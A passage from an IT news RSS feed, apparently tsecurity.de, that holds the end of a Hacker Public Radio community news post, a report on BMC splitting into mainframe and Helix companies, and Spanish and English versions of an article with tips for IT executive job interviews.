by <a href="https://hackerpublicradio.org/correspondents/0201.html" target="_blank">MrX</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4222/index.html#comment_4081" target="_blank">Comment 1</a>:
Beeza on 2024-10-08:
"Old Batteries"</li><li><a href="https://hackerpublicradio.org/eps/hpr4222/index.html#comment_4082" target="_blank">Comment 2</a>:
MrX on 2024-10-10:
"Re Old Batteries"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4224/index.html#comments" target="_blank">hpr4224</a></strong>
(2024-10-10) "<em>Auto shop interaction</em>"
by <a href="https://hackerpublicradio.org/correspondents/0318.html" target="_blank">Archer72</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4224/index.html#comment_4084" target="_blank">Comment 1</a>:
A. Listener on 2024-10-12:
"issue with downloading shows"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4228/index.html#comments" target="_blank">hpr4228</a></strong>
(2024-10-16) "<em>Auditing Audio Files For Youtube</em>"
by <a href="https://hackerpublicradio.org/correspondents/0430.html" target="_blank">Dave Hingley</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4228/index.html#comment_4089" target="_blank">Comment 1</a>:
Kevie on 2024-10-26:
"Youtube's copyright strikes"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4231/index.html#comments" target="_blank">hpr4231</a></strong>
(2024-10-21) "<em>Duplicating Multiple USB Flash Drives with DD and Tmux on FreeBSD</em>"
by <a href="https://hackerpublicradio.org/correspondents/0152.html" target="_blank">Claudio Miranda</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4231/index.html#comment_4091" target="_blank">Comment 1</a>:
Gumnos on 2024-10-29:
"Getting status of dd in OpenBSD"</li><li><a href="https://hackerpublicradio.org/eps/hpr4231/index.html#comment_4092" target="_blank">Comment 2</a>:
hairylarry on 2024-10-30:
"Similarly"</li><li><a href="https://hackerpublicradio.org/eps/hpr4231/index.html#comment_4097" target="_blank">Comment 3</a>:
ClaudioM on 2024-10-31:
"Re: Similarly"</li><li><a href="https://hackerpublicradio.org/eps/hpr4231/index.html#comment_4098" target="_blank">Comment 4</a>:
ClaudioM on 2024-10-31:
"Re: Getting status of dd in OpenBSD"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4236/index.html#comments" target="_blank">hpr4236</a></strong>
(2024-10-28) "<em>History of Nintendo</em>"
by <a href="https://hackerpublicradio.org/correspondents/0434.html" target="_blank">Lochyboy</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4236/index.html#comment_4090" target="_blank">Comment 1</a>:
Steve Barnes on 2024-10-29:
"Ahhyes."</li><li><a href="https://hackerpublicradio.org/eps/hpr4236/index.html#comment_4096" target="_blank">Comment 2</a>:
ClaudioM on 2024-10-31:
"Virtual Boy?"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4237/index.html#comments" target="_blank">hpr4237</a></strong>
(2024-10-29) "<em>My First OggCamp Experience</em>"
by <a href="https://hackerpublicradio.org/correspondents/0296.html" target="_blank">Kevie</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4237/index.html#comment_4093" target="_blank">Comment 1</a>:
Peter - SolusSpider on 2024-10-30:
"OggCamp Dining Experience"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4238/index.html#comments" target="_blank">hpr4238</a></strong>
(2024-10-30) "<em>Snaps are better than flatpaks</em>"
by <a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4238/index.html#comment_4094" target="_blank">Comment 1</a>:
Trey on 2024-10-30:
"Ethernet cable"</li><li><a href="https://hackerpublicradio.org/eps/hpr4238/index.html#comment_4099" target="_blank">Comment 2</a>:
Elliot B on 2024-11-01:
"Snaps are the least worst"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4240/index.html#comments" target="_blank">hpr4240</a></strong>
(2024-11-01) "<em>The First Doctor, Part 1</em>"
by <a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4240/index.html#comment_4095" target="_blank">Comment 1</a>:
Kevie on 2024-10-31:
"Keep them coming"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4266/index.html#comments" target="_blank">hpr4266</a></strong>
(2024-12-09) "<em>What's the weather?</em>"
by <a href="https://hackerpublicradio.org/correspondents/0403.html" target="_blank">Lee</a>.</li>
<li>
<ul><li><a href="https://hackerpublicradio.org/eps/hpr4266/index.html#comment_4085" target="_blank">Comment 1</a>:
Lee on 2024-10-21:
"Errata"</li></ul><br>
</li></ul>

<h2>Mailing List discussions</h2>
<p>
Policy decisions surrounding HPR are taken by the community as a whole. This
discussion takes place on the <a href="https://hackerpublicradio.org/maillist" target="_blank">Mail List</a> which is open to all HPR listeners and
contributors. The discussions are open and available on the HPR server under
<a href="https://lists.hackerpublicradio.com/pipermail/hpr">Mailman</a>.
</p>
<p>The threaded discussions this month can be found here:</p>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2024-October/thread.html" target="_blank">https://lists.hackerpublicradio.com/pipermail/hpr/2024-October/thread.html</a>


<h2>Events Calendar</h2>
<p>With the kind permission of <strong>LWN.net</strong> we are linking to
<a href="https://lwn.net/Calendar/" target="_blank">The LWN.net Community Calendar</a>.</p>
<p>Quoting the site:</p>
<blockquote>This is the LWN.net community event calendar, where we track
events of interest to people using and developing Linux and free software.
Clicking on individual events will take you to the appropriate web
page.</blockquote>

<h2>Any other business</h2>
<h3>HPR Updates</h3>
<ul>
<li><p>There has been a lot of activity this month on the Gitea repos
with <code>rho`n</code> catching up on outstanding bugs. We also had a
lot of changes due to the ongoing Internet Archive outage that is still
impacting us. A quick fix was to host the 10 day feed directly from the
HPR server, but since then we have made all the media available on the
HPR Community Content Delivery Network.</p></li>
<li><p>We will have three sources but if you meet the requirements for
hosting, and wish to help out please get in touch.</p>
<ul>
<li>24/7 Home Service</li>
<li>Fixed IP address</li>
<li>Unlimited bandwidth</li>
<li>Fast &gt; 500mb/sec upload</li>
<li>Large &gt; 1T of storage</li>
<li>Permission from your ISP to run a web server</li>
<li>Contact information known to the Janitors</li>
<li>Optional: UPS</li>
</ul></li>
<li><p>We added a html link to the comments page to provide direct
feedback from any app that supports it. Eg: gPodder opens Firefox at the
comment form.</p></li>
<li><p>We have consolidated a lot of repositories on Gitea, removing
some and moving others. https://repo.anhonesthost.net/HPR</p></li>
<li><p>Documentation is now available and includes:</p>
<ul>
<li><em>Community Content Delivery Network (CCDN)</em> A location to
track the deployment of the HPR Community Content Delivery Network, that
provides a mirror network for our content.</li>
<li><em>HPR Website Design</em> This is literally in the whiteboard
phase of the HPR website redesign.</li>
<li><em>Podcatcher and Podcasting Platform Compatibility</em> Where we
can track Compatibility of the clients subscribed to our feeds.</li>
<li><em>Useful Resources</em> Where we can link to other free culture
sites that provide useful services.</li>
<li><em>Requested Topics</em> Where we can track topics that have been
requested, and link to shows that addressed them.</li>
<li>Workflow issues.</li>
</ul></li>
</ul>
<h3>Message from Dave Morriss</h3>
<ul>
<li><p>I am planning to "retire" from the Hacker Public Radio Janitorial
Team. I have been helping to administer HPR for over 12 years now. I
first offered help to Ken in 2012 in response to an appeal he made. We
met at OggCamp in that year, and I joined the Community News recording
for episode <a href="https://hackerpublicradio.org/eps/hpr1066/">1066</a> in September
2012. My first show was <a href="https://hackerpublicradio.org/eps/hpr1091">1091</a> in October
that year.</p></li>
<li><p>I will turn 75 in December 2024, and am finding that I don't have
the energy to do as much as I could when I first joined. I also want to
be able to devote more time to the various personal projects I
have.</p></li>
<li><p>I plan to consolidate all my scripts on the HPR Gitea
repositories, and document all the processes I have been looking after.
I want to have completed the handover by the end of March 2025.</p></li>
<li><p>I will continue as an HPR host for as long as I can after
that.</p></li>
<li><p>I have had a wonderful 12 years as an HPR Janitor and will always
look back on it with great pleasure.</p></li>
</ul>


<p><a href="https://hackerpublicradio.org/eps/hpr4241/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BMC breaks into two: Mainframe and Helix businesses to operate independently]]></title>
<description><![CDATA[BMC today announced plans to divide its existing company into two standalone software companies, one focusing on its long-standing mainframe business and the other focusing on tools for managing IT and distributed operations.



Houston-based BMC has been owned by global investment firm KRR since...]]></description>
<link>https://tsecurity.de/de/2377322/it-security-nachrichten/bmc-breaks-into-two-mainframe-and-helix-businesses-to-operate-independently/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2377322/it-security-nachrichten/bmc-breaks-into-two-mainframe-and-helix-businesses-to-operate-independently/</guid>
<pubDate>Wed, 09 Oct 2024 19:34:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>BMC today announced plans to divide its existing company into two standalone software companies, one focusing on its long-standing <a href="http://security,%20aiops%20top%20mainframe%20customer%20challenges,%20bmc%20says/">mainframe business</a> and the other focusing on tools for managing IT and distributed operations.</p>



<p>Houston-based BMC has been owned by global investment firm KRR since 2018. BMC will remain the name of the company that includes the mainframe and software automation technologies, including BMC’s Intelligent Z Optimization and Transformation (IZOT) and Digital Business Automation (DBA) business units. BMC Helix will encompass the Digital Service and Operations Management (DSOM) lines of business.</p>



<p>“We have determined that the two companies will better serve their markets individually. Each of these businesses has its own profile and characteristics in growth opportunities, margins and profitability, and competitive landscape. We are confident that the underlying economics of both businesses sets each company up to continue driving innovation and growth for long-term success,” Ayman Sayed, president and CEO, said in a <a href="https://www.bmc.com/content/dam/bmc/collateral/bmc/message-from-ceo.pdf" target="_blank" rel="noreferrer noopener">statement</a>.</p>



<p>The strategic move could benefit the two entities as well as their customers, industry watchers say. To start, the division would make each company more nimble and better able to direct resources to their areas of expertise. And customers across the product portfolios would also benefit from the enhanced focus, analysts say.</p>



<p>“One company will have their mainframe business (about two-thirds of the total $2.3 billion in revenues are mainframe or about $1.5 billion). And the second company, BMC Helix, will house the distributed business (about $800 million in revenues). It’s generally a three-horse race with Broadcom, BMC, and IBM with other smaller players across various mainframe disciplines,” explains Stephen Elliot, group vice president at IDC. </p>



<p>“Customers should be able to benefit from the improved focus,” Elliot says, including a more targeted allocation of people, budgets and other resources. “As one company, BMC was spreading a limited R&amp;D budget across too many product needs,” he says.</p>



<p>The divided companies should be able to better accelerate product development in their respective areas without any internal politics around feature prioritization, driving innovation in both the mainframe and distributed businesses at an accelerated pace, Elliot says. </p>



<p>This move could also help with strategic partnerships that perhaps didn’t make sense when the various product divisions were under one company, Elliot says. “It’s critical to note that with two businesses, each business now has the ability to partner with vendors that in the past might have been seen as competitors and off-limits. It opens up some interesting political scenarios,” he says.</p>



<p>BMC also emphasized that the division will benefit customers and partners by sharpening each company’s focus. “Our customers and partners look to us in their transformation journeys to enable business faster than humanly possible. As a strategic partner for ongoing innovation in their mainframe, distributed, cloud, and edge technology needs, the creation of two companies puts them at the core of each company’s mission with deeper specialization and vertical industry focus,” Sayed said in the statement.</p>



<p>“Also, let’s not forget that this now provides KRR with two potential financial exists—and the increased focus enables each business to potentially generate higher growth rates, which in turn drives a higher valuation,” Elliot explains.</p>



<p>Founded in September 1980, BMC Software started as a software developer for IBM mainframe systems and after 10 years expanded its product portfolio to include other systems, such as Windows. In May 2013, BMC announced it was being acquired by a group of major private equity investment groups, and in October 2018, BMC was acquired by KKR, a global investment firm. BMC was first listed as a public company in 1988, but it was then removed in 2013. In 2023, BMC <a href="https://www.forex.com/en/news-and-analysis/bmc-ipo/#:~:text=BMC%20was%20founded%20in%201980,boasts%20more%20than%206%2C000%20employees." target="_blank" rel="noreferrer noopener">filed confidentially for an IPO</a>.</p>



<p>The transition to two independent software companies is expected to begin in early 2025, BMC said.</p>



<h2 class="wp-block-heading">Read more mainframe news</h2>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/3541333/security-aiops-top-mainframe-customer-challenges-bmc-says.html">Security, AIOps top mainframe customer challenges, BMC says</a></li>



<li><a href="https://www.networkworld.com/article/2088250/mainframe-turns-60-with-no-plans-for-retirement.html">Mainframe turns 60 with no plans for retirement</a></li>



<li><a href="https://www.networkworld.com/article/1311969/ibm-program-targets-mainframe-skills-shortage.html">Training program targets mainframe skills shortage</a></li>



<li><a href="https://www.networkworld.com/article/3494568/ibm-z-mainframes-get-ai-boost-with-new-telum-ii-processor-spyre-accelerator.html">IBM Z mainframes get AI boost with new Telum II processor, Spyre accelerator</a></li>



<li><a href="https://www.networkworld.com/article/3513738/kyndryl-ai-interest-is-driving-mainframe-modernization-projects.html">Kyndryl: AI interest is driving mainframe modernization projects</a></li>



<li><a href="https://www.networkworld.com/article/2121573/ibm-brings-ai-assistant-to-mainframe-promises-linux-version.html">IBM brings AI assistant to mainframe, promises Linux version</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diez maneras de ‘clavar’ la entrevista al puesto de CIO]]></title>
<description><![CDATA[Ha trabajado duro para progresar en su carrera y está listo para dar el salto al liderazgo. Ha conseguido una entrevista para un puesto ejecutivo de TI en una empresa que le gusta. Al igual que todos los pasos que le han llevado hasta este momento, su actuación es vital para conseguir los resulta...]]></description>
<link>https://tsecurity.de/de/2363851/it-security-nachrichten/diez-maneras-de-clavar-la-entrevista-al-puesto-de-cio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2363851/it-security-nachrichten/diez-maneras-de-clavar-la-entrevista-al-puesto-de-cio/</guid>
<pubDate>Wed, 02 Oct 2024 10:04:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ha trabajado duro para progresar en su carrera y está listo para dar el salto al liderazgo. Ha conseguido una entrevista para un puesto ejecutivo de TI en una empresa que le gusta. Al igual que todos los pasos que le han llevado hasta este momento, su actuación es vital para conseguir los resultados que desea. ¿Qué trabajo de campo debe hacer para triunfar en la entrevista? ¿Qué ropa debe llevar? ¿Qué preguntas debe estar preparado para responder? ¿Qué preguntas debe hacer a su posible futuro empleador?</p>



<p>Para ayudarle a superar la entrevista, en CIO hemos hablado con ejecutivos de TI que han contratado a personas para puestos como éste, con asesores profesionales que aconsejan a líderes de TI sobre cómo conseguir su próximo puesto y con otros expertos para averiguar qué debes hacer y qué no. He aquí 10 consejos.</p>



<h2 class="wp-block-heading"><strong>Saber qué marca la diferencia en una entrevista ejecutiva</strong></h2>



<p>Un puesto ejecutivo tiene más que ver con la gestión de personas, la comunicación, la dirección y el pensamiento estratégico que con la tecnología en sí. De eso trata esta entrevista. La entrevista ejecutiva de TI es una combinación de conversaciones con directivos de alto nivel que quieren saber si puede comunicarse con los líderes -incluidos los no técnicos- al más alto nivel de la organización. “Tendrá que colaborar con todas las partes interesadas”, explica Vishal Grover, CIO de Apexanalytix. En este puesto se busca a una persona que sepa gestionar crisis. ¿Hasta qué punto se siente cómodo en una situación a la que no se ha enfrentado antes?”.</p>



<p>También tendrá que ser un pensador estratégico y ser capaz de captar los objetivos de la empresa y trabajar para alcanzarlos. “Busco a personas que tengan curiosidad intelectual y que desafíen el <em>statu quo</em>”, dice Stephen Franchetti, CIO de Samsara. “Cuando los entrevistados llegan a mis manos, sus capacidades y habilidades técnicas ya han sido comprobadas. Busco a alguien que venga con una nueva perspectiva y tenga curiosidad por aprender”.</p>



<h2 class="wp-block-heading"><strong>Entender de dónde viene cada entrevistador para saber por dónde guiarle</strong></h2>



<p>Cada entrevista es diferente, así que no hay forma de predecir realmente cómo evolucionará. Pero para un puesto ejecutivo, sin duda, conocerá al equipo directivo, y eso implicará probablemente varias conversaciones. Cada persona tendrá sus propios criterios y preguntas. Algunos querrán evaluar sus capacidades técnicas, por ejemplo. Otros no. “Algunas empresas no necesitan que tenga conocimientos técnicos”, dice Kyle Elliot, fundador y <em>coach</em> de carreras tecnológicas en CaffeinatedKyle.com. “Otras empresas, como Apple o Google, por ejemplo, querrán que sí comparta este tipo de conocimientos”.</p>



<p>Investigar le ayudará a prepararse. “Utilice Reddit, el sitio web de la empresa o a su reclutador para saber qué conocimientos técnicos quieren que tenga”, dice Elliot. Y compruebe, a medida que avanza en la entrevista, que se desenvuelve en el nivel técnico adecuado. “Deje que el entrevistador le guíe hasta dónde quiere que llegue”, dice.</p>



<p>Por muy técnico que sea, también es probable que le pidan que explique cómo ha resuelto un problema difícil, cómo ha fracasado en algo, cómo se ha recuperado de un desastre, cómo ha tomado decisiones importantes y dónde quiere estar dentro de cinco años. No tiene que hacerse pasar por un héroe en todas las situaciones. En una entrevista de alto nivel quieren saber que puede aprender, admitir sus errores y asumir responsabilidades.</p>



<h2 class="wp-block-heading"><strong>Investigar y tener claros los temas de conversación</strong></h2>



<p>Franchetti pide a los candidatos que describan una situación en la que intentaron resolver un problema difícil y fracasaron. “Busco gente que confiese”, dice. “También quiero que describan lo que aprendieron. Todo el mundo comete errores. Pero, ¿qué aprendieron de ellos?”.</p>



<p>Todas las personas consultadas afirman que los entrevistadores esperan que los candidatos investiguen sobre la empresa y conozcan sus productos, objetivos, declaraciones de misión y demás. “Los candidatos deben conocer los objetivos y los datos financieros de la empresa”, indica Wendi Zhang, de Egon Zehnder, una empresa de búsqueda de directivos y asesoramiento en liderazgo. “Infórmese de lo que se dice en la prensa. Lea el sitio web. Si tiene amigos en el sector o en esa empresa, pregúnteles qué está pasando. Debería conocer el objetivo general y las prioridades de la compañía”.</p>



<p>También debe conocerse a sí mismo y saber qué quiere de este puesto. “A veces la gente de este nivel cree que no necesita prepararse”, dice Elliott. “Esto es un error. Animo a la gente a que se prepare como un político. Tenga claros sus temas de conversación. Es imposible prepararse para todas las posibles preguntas de la entrevista. En lugar de eso, prepare los puntos que quiere transmitir e introdúzcalos en la conversación”.</p>



<h2 class="wp-block-heading"><strong>Conseguir un equilibrio en las redes sociales</strong></h2>



<p>Es fácil localizar a los directivos de una empresa en las redes sociales, leer lo que han publicado, conectar con ellos e intentar hacer amigos. Pero, ¿debería hacerlo?. “Hay que hacerlo con cuidado”, dice Zhang. “Hay mucha información disponible públicamente”. Parte de ella estará en las redes sociales.</p>



<p>“LinkedIn es muy potente”, dice Elliott. “Especialmente para socios interfuncionales. Si es un líder de TI, hablar con producto, UX o ventas y aprender lo que es importante para ellos puede ser útil”. </p>



<p>Una vez más, sin embargo, hay que pensar bien con quién se relaciona, de qué habla y qué información aporta a la entrevista. Hay una delgada línea entre investigar una empresa y parecer invasivo. “No querrá decir: ‘Oh, veo que hizo un viaje divertido hace un año’”, dice Elliott. “Pero puede ser útil conocer los antecedentes de las personas, si proceden de la ingeniería o si han trabajado en empresas similares. Esta entrevista trata de ver cómo se comunica, cómo colabora”. El uso que haga de las redes sociales forma parte de ello.</p>



<h2 class="wp-block-heading"><strong>Preparar historias sobre experiencia en liderazgo</strong></h2>



<p>Una comunicación eficaz tiene sus raíces en la narración de historias. Cuando se esté preparando, <a href="https://www.cio.com/article/1288862/storytelling-for-cios-from-niche-to-bestseller.html" target="_blank">desarrolle algunas historias sobre sus experiencias de liderazgo</a> y téngalas presentes. Recuerde ejemplos de cómo respondió a una catástrofe, resolvió un problema, superó un obstáculo o colaboró con un equipo. Recopile sus historias antes de la entrevista.</p>



<p>“A menudo, la gente me dice: ‘Soy estratégico, se me da muy bien dirigir”, dice Elliott. Y cuando les pide ejemplos, no están preparados. No querrá salir de la entrevista y, sólo entonces, recordar una anécdota que demuestre su capacidad para tomar decisiones rápidas y meditadas. “Querrán ver ejemplos y escuchar historias. Téngalas preparadas”, dice.</p>



<p>Esas historias deben provenir en gran parte del lugar de trabajo, no de la vida personal, por muy aventurera o convincente que sea. Hay que reducir al mínimo los ejemplos sacados de deportes extremos o aventuras en la naturaleza y, si utiliza historias de este tipo, es mejor asegurarse de que están relacionadas con el puesto en cuestión de forma que reflejen bien el tipo de líder que será en la empresa.</p>



<h2 class="wp-block-heading"><strong>Desaprender las formas tradicionales realizar una entrevista</strong></h2>



<p>En las entrevistas de nivel inferior, y <a href="https://www.cio.com/article/288786/careers-staffing-how-to-prepare-for-and-ace-the-technical-interview.html" target="_blank">en las técnicas en particular</a>, buscar las preguntas típicas de una entrevista y pedir las respuestas a una IA puede ser aceptable. Pero a este nivel, los trucos habituales para preparar las preguntas pueden resultar contraproducentes. “Esto puede ser difícil”, dice Elliot, “cuando se está acostumbrado a una respuesta correcta o incorrecta”.</p>



<p>Los clientes de Elliot suelen preguntar no sólo por las preguntas más habituales, sino también por las mejores respuestas a las mismas. “No hay una respuesta correcta o incorrecta”, dice, cuando se trata de la entrevista ejecutiva. “Se trata más bien de la estrategia, el valor empresarial y el impacto que se puede ofrecer”.</p>



<p>Los directivos de TI consultados están de acuerdo. Cuando entrevistan a otras personas para puestos ejecutivos, les hacen preguntas o les piden una historia, pero no buscan respuestas repetitivas. Quieren escuchar sus argumentos y comprobar lo bien que se comunican. “Me interesa su capacidad para comunicarse eficazmente a nivel ejecutivo”, dice Franchetti. “Ésa será la diferencia entre el éxito y el fracaso en su puesto”. “Además de ser capaces de hacer lo fundamental, como hacer el trabajo y dirigir al equipo, busco que sean capaces de comunicarse con impacto”.</p>



<p>Así que, en lugar de prepararse para una pregunta concreta, debe saber qué quiere decir y cómo quiere decirlo. Céntrese en sus objetivos. Prepare sus historias. Y utilice estas preguntas como una oportunidad para demostrar sus habilidades. “A medida que va ascendiendo en su carrera, se trata menos de lo que está bien o mal, menos de los conocimientos técnicos, y más de esa estrategia de alto nivel y de cómo se comunica”, dice Elliott. “Tiene que desaprender formas anteriores de entrevistar”.</p>



<h2 class="wp-block-heading"><strong>Practicar, practicar y practicar</strong></h2>



<p>Debe practicar sin falta. <a href="https://www.cio.com/article/1293507/6-signs-you-might-need-an-executive-coach-and-2-signs-you-dont.html" target="_blank">Consiga un <em>coach</em> ejecutivo</a>. <a href="https://www.cio.com/article/288201/9-rules-for-working-with-headhunters-and-it-recruiters.html" target="_blank">Trabaje con su reclutador</a>. Practique con un amigo o su pareja. Se trata de una actuación y debe estar preparado para ello. Elliott trabaja con sus clientes antes de una entrevista para ayudarles a hacerlo.</p>



<p>“Desarrollamos sus temas de conversación”, dice. “Les hago preguntas al azar. Encuentro preguntas para las que no se han preparado para ver lo bien que pueden responder a esas preguntas imprevistas utilizando esos temas de conversación”. Esto será mucho más fácil de hacer en la entrevista si practica de antemano.</p>



<h2 class="wp-block-heading"><strong>Asegurarse de que su vestimenta concuerda con el puesto al que aspira</strong></h2>



<p>Según todas las personas con las que he hablado, la forma de vestir es importante. Pero la cuestión de la moda no tiene una respuesta sencilla. Hubo un tiempo en que uno podía ponerse un traje y, siempre que no se fuera a una gala de etiqueta, parecía que nunca se iba demasiado elegante. Pero eso ya no es así.</p>



<p>Franchetti, que es CIO de una empresa tecnológica de operaciones físicas con sede en San Francisco, espera que los candidatos se arreglen para una entrevista. “Espero que alguien se esfuerce en cómo presentarse”, dice. “Eso refleja cómo se van a presentar al resto de la organización”. Pero es posible ir demasiado lejos. “Si se presentaran con traje y corbata, eso podría ser exagerado”, dice.</p>



<p>Esto también puede variar de una empresa a otra. Por ejemplo, en el sector financiero o jurídico, ese nivel de formalidad puede ser justo lo que la situación requiere. “Infórmese bien”, dice Zhang. “Entre en las redes sociales e intente hacerse una idea de cómo visten en esa empresa. Algunas empresas son más formales. Si se presenta allí vestido con ropa de Silicon Valley, puede producirse un choque cultural; lo mismo ocurre si va a un entorno informal con un traje”.</p>



<h2 class="wp-block-heading">Realizar preguntas inteligentes</h2>



<p>Llegará un momento, a menudo al final de la entrevista, en el que tendrá la oportunidad de hacer preguntas. Es su oportunidad de cerrar con una nota fuerte. “¿Cuál es su objetivo?, pregunta Elliott. “¿Qué quiere que aprendan de usted? Empiece por ahí y trabaje hacia atrás para desarrollar sus preguntas”.</p>



<p>Franchetti dice que, si quiere terminar con fuerza, “hay que hacer grandes preguntas. Tenga tres preguntas realmente potentes. Dependiendo de la duración de la entrevista, puede que no las haga todas. Pero haga preguntas inteligentes”.</p>



<p>Quizá una de sus preguntas sea sobre la cultura de la empresa. No pida al entrevistador que se la describa. Haga una pregunta que demuestre que ha investigado. “En otras palabras”, dice Franchetti, “no pregunte: ¿Cómo es la cultura? Sea más específico. Demuestre que conoce la empresa y sabe de lo que habla”.</p>



<p>Quizá haya investigado la cultura de la empresa en su página web, en las redes sociales o en las noticias. “Cuénteles lo que sabe sobre la cultura”, dice Franchetti, y haga una pregunta concreta al respecto. “Sería estupendo que alguien me preguntara, por ejemplo: ‘Sus principios operativos me llaman mucho la atención. ¿Cómo los ponen en práctica?”.</p>



<h2 class="wp-block-heading"><strong>Hacer un seguimiento que demuestre interés por el puesto</strong></h2>



<p>Enviar un mensaje de seguimiento puede parecer anticuado, pero todas las personas consultadas coinciden en que es una buena idea. No tiene por qué ser larga ni compleja. Puede ser un simple correo electrónico de agradecimiento. Pero también puede aprovecharlo para insistir en uno de sus objetivos o reiterar un tema de conversación.</p>



<p>“Haga un seguimiento”, dice Grover, CIO de Apexanalytix. “Demuestre que está motivado, interesado, incluso con ganas por este puesto en esta empresa. Es algo positivo. Comprobar algo, hacer un seguimiento, nunca es negativo. No hay que ser pesado. Pero hacer un seguimiento pone de manifiesto que quiere el puesto”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 ways to ace the IT executive interview]]></title>
<description><![CDATA[You’ve worked hard advancing your career and are ready to make the shift to leadership. You’ve landed an interview for an IT executive position at a company you like. Like every step that got you to this moment, how you perform is vital for achieving the results you want.



What kind of research...]]></description>
<link>https://tsecurity.de/de/2355537/it-security-nachrichten/10-ways-to-ace-the-it-executive-interview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2355537/it-security-nachrichten/10-ways-to-ace-the-it-executive-interview/</guid>
<pubDate>Fri, 27 Sep 2024 12:19:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You’ve worked hard advancing your career and are ready to make the shift to leadership. You’ve landed an interview for an IT executive position at a company you like. Like every step that got you to this moment, how you perform is vital for achieving the results you want.</p>



<p>What kind of research should you do to ace this interview? What should you wear? What questions should you be prepared to answer? What questions should you ask of your potential future employer?</p>



<p>To help you nail the interview, I spoke to IT executives who have hired people for roles like this one, career coaches who counsel IT leaders on landing their next role, and other experts to find out what you should — and should not — do.</p>



<p>Here are 10 tips to help you prep.</p>



<h2 class="wp-block-heading">Know what makes the executive interview stand apart</h2>



<p>An executive role is more about managing people, communicating with leadership, and thinking strategically than it is about technology itself. That’s what this interview is all about.</p>



<p>The IT executive interview is a gauntlet of conversations with high-level management because they want to know whether you can communicate with leaders — including non-technical ones — at the highest level of the organization. “You will need to collaborate with all the stakeholders,” explains Vishal Grover, CIO at apexanalytix. “I look for an individual in this role who can do crisis management. How comfortable are you in a situation you haven’t faced before?”</p>



<p>You will also need to be a strategic thinker and be able to grasp and work toward company goals.</p>



<p>“I look for people who are intellectually curious and will challenge the status quo,” says Stephen Franchetti, CIO at Samsara. “By the time interviewees get to me, their technical capabilities and skills have been vetted. I’m looking for someone who will come in with a new perspective and be curious to learn.”</p>



<h2 class="wp-block-heading">Understand where each interviewer is coming from to know where to lead them</h2>



<p>Every interview is different, so there is no way to truly predict how it will evolve. But for an executive position, you will certainly meet the leadership team, and that will likely mean several conversations. Each person will have their own criteria and questions. Some might want to evaluate your technical abilities, for example. Others might not.</p>



<p>“Some companies don’t need you to be technically savvy or knowledgeable,” says Kyle Elliot, founder and tech career coach at CaffeinatedKyle.com. “Other companies, like an Apple or Google for example, will want you to share your technical know-how.”</p>



<p>Research will help prepare you, either way. “Use Reddit, the company website, or your recruiter to learn how technically savvy they want you to be,” says Elliot. And check, as you go through the interview, to make sure you are operating at the right technical level. “Allow the interviewer to guide you as to how far into the weeds they want you to go,” he says.</p>



<p>However technical you get, you are also likely to be asked to explain how you solved a difficult problem, failed at something, recovered from a disaster, made important decisions, and where you want to be in five years.</p>



<p>You don’t have to make yourself look like the hero in every situation. At a high-level interview, they want to know you can learn, admit your mistakes, and take responsibility. </p>



<p>Franchetti asks candidates to describe a situation where they tried to solve a hard problem and failed. “I’m looking for people to fess up,” he says. “I also want them to describe what they learned. Everyone makes mistakes. But what did you learn from it?”</p>



<h2 class="wp-block-heading">Research, research, research — and have your talking points down</h2>



<p>Everyone I spoke to said that interviewers expect candidates to research the company and know its products, goals, mission statements, and more.</p>



<p>“Candidates need to understand the top-level company goals and financials,” says Wendi Zhang at Egon Zehnder, an executive search and leadership advisory firm. “Learn what’s been said in the press. Read the website. If you have friends in the industry or that company, ask what’s going on. You should know the greater purpose and priorities for the company.”</p>



<p>You should also know yourself and what you want from this role.</p>



